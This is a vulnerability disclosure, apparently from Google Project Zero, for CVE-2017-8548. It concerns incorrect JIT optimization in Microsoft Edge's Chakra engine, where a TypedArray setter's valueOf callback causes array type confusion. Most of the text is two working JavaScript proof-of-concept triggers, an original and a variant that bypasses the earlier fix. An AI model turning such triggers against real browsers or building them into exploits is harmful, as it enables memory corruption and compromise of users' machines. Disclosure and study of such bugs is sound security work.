Microsoft Edge Chakra Incorrect Jit Optimization

`Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2  
  
CVE-2017-8548  
  
  
I think the fix for #1045 is incorrect.  
  
Here's the original PoC.  
  
'use strict';  
  
function func(a, b, c) {  
a[0] = 1.2;  
b[0] = c;  
a[1] = 2.2;  
a[0] = 2.3023e-320;  
}  
  
function main() {  
var a = [1.1, 2.2];  
var b = new Uint32Array(100);  
  
// force to optimize  
for (var i = 0; i < 0x10000; i++)  
func(a, b, i);  
  
func(a, b, {valueOf: () => {  
a[0] = {};  
  
return 0;  
}});  
  
a[0].toString();  
}  
  
main();  
  
  
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.  
  
PoC:  
'use strict';  
  
function func(a, b, c) {  
a[0] = 1.2;  
b[0] = c;  
a[1] = 2.2;  
a[0] = 2.3023e-320;  
}  
  
function main() {  
var a = [1.1, 2.2];  
var b = new Uint32Array(0); // <<--------- 100 -> 0  
  
// force to optimize  
for (var i = 0; i < 0x10000; i++)  
func(a, b, i);  
  
func(a, b, {valueOf: () => {  
a[0] = {};  
  
return 0;  
}});  
  
a[0].toString();  
}  
  
main();  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`